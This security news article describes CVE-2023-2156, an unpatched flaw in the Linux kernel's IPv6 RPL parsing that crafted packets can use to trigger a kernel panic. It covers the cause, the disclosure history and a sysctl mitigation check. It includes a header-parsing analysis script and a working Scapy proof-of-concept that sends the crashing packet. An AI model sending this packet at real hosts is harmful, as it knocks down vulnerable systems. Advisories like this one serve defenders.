0-day vulnerability in the Linux IPv6 stack that allows a remote kernel crash

Details have been published about an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel that makes it possible to halt the system by sending specially crafted IPv6 packets (packet-of-death). The problem only appears when support for the RPL (Routing Protocol for Low-Power and Lossy Networks) protocol is enabled. RPL is disabled by default in distributions and is used mainly on embedded devices that operate in wireless networks with high packet loss.

The vulnerability is caused by incorrect handling of external data in the RPL protocol parsing code, which leads to an assertion failure and puts the kernel into a panic state. When the data obtained from parsing the IPv6 RPL packet header is placed in the sk_buff (Socket Buffer) structure, if the CmprI field is set to 15, the Segleft field to 1, and CmprE to 0, the 48-byte address vector is decompressed to 528 bytes, and the memory allocated for the buffer turns out to be insufficient. In this case the skb_push function, which is used to push data into the structure, detects the mismatch between the size of the data and the buffer and triggers a panic to prevent a write beyond the buffer boundary.
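The 48-to-528-byte expansion follows from the address-count formula in RFC 6554. The block below is an added example, not code from the original article or from the kernel: it parses the fixed part of an RPL routing header and reports the on-wire and expanded sizes of the address vector. The function names, the `max_growth` threshold and the sample headers are constructed for illustration.

```python
import struct

RPL_SRH_TYPE = 3   # IPv6 routing header type used by RPL (RFC 6554)
FIXED_LEN = 8      # bytes before the address vector

def rpl_srh_expansion(hdr: bytes) -> dict:
    """Parse an RFC 6554 routing header; compare on-wire and expanded address sizes."""
    if len(hdr) < FIXED_LEN:
        raise ValueError("truncated routing header")
    _next, hdrlen, rtype, segleft, cmpr, pad_byte = struct.unpack_from("!6B", hdr)
    if rtype != RPL_SRH_TYPE:
        raise ValueError("not an RPL source routing header")
    cmpri, cmpre, pad = cmpr >> 4, cmpr & 0x0F, pad_byte >> 4
    wire = hdrlen * 8  # compressed address vector, in bytes
    if len(hdr) < FIXED_LEN + wire:
        raise ValueError("header shorter than Hdr Ext Len claims")
    # RFC 6554: n = ((HdrExtLen*8 - Pad - (16 - CmprE)) / (16 - CmprI)) + 1
    body = wire - pad - (16 - cmpre)
    if body < 0 or body % (16 - cmpri):
        raise ValueError("length and compression fields are inconsistent")
    n = body // (16 - cmpri) + 1
    return {"cmpri": cmpri, "cmpre": cmpre, "segleft": segleft,
            "addresses": n, "wire_bytes": wire, "expanded_bytes": n * 16}

def needs_review(hdr: bytes, max_growth: int = 4) -> bool:
    """Hypothetical triage rule: expanded vector exceeds max_growth times the wire size."""
    info = rpl_srh_expansion(hdr)
    return info["expanded_bytes"] > max_growth * info["wire_bytes"]

def sample_header(cmpr: int) -> bytes:
    """Constructed sample: Hdr Ext Len 6 (48 address bytes), Segments Left 1."""
    return bytes([59, 6, RPL_SRH_TYPE, 1, cmpr, 0, 0, 0]) + bytes(48)

if __name__ == "__main__":
    for label, cmpr in (("uncompressed", 0x00), ("CmprI=15, CmprE=0", 0xF0)):
        print(label, rpl_srh_expansion(sample_header(cmpr)))
```

With CmprI=15 every byte of the vector except the last 16 counts as one compressed address, so 48 bytes describe 33 addresses of 16 bytes each once expanded.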

Example exploit:

```python
# We'll use Scapy to craft the packet
import sys
import socket
from scapy.all import *

# Use the IPv6 address of your LAN interface
DST_ADDR = sys.argv[1]
SRC_ADDR = DST_ADDR

# We use sockets to send the packet
sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

# Craft the packet
#   Type = 3 makes this an RPL packet
#   Addresses contains 3 addresses, but because CmprI is 15,
#       each octet of the first two addresses is treated as a compressed address
#   Segleft = 1 to trigger the amplification
#   lastentry = 0xf0 sets CmprI to 15 and CmprE to 0
p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

# Send this evil packet
sockfd.sendto(bytes(p), (DST_ADDR, 0))
```

Notably, the kernel developers were notified of the vulnerability back in January 2022, and over the following 15 months they tried to fix the problem three times, releasing patches in September 2022, October 2022 and April 2023. Each time the fix was insufficient and the vulnerability could still be reproduced. In the end the ZDI project, which coordinated the work on fixing the vulnerability, decided to publish detailed information about it without waiting for a working fix to become available in the kernel.

As a result, the vulnerability still remains unfixed. In particular, the patch included in the 6.4-rc2 kernel is ineffective. Users are advised to check that the RPL protocol is not in use on their systems, which can be done with the command sysctl -a | grep -i rpl_seg_enabled

Source: opennet.ru
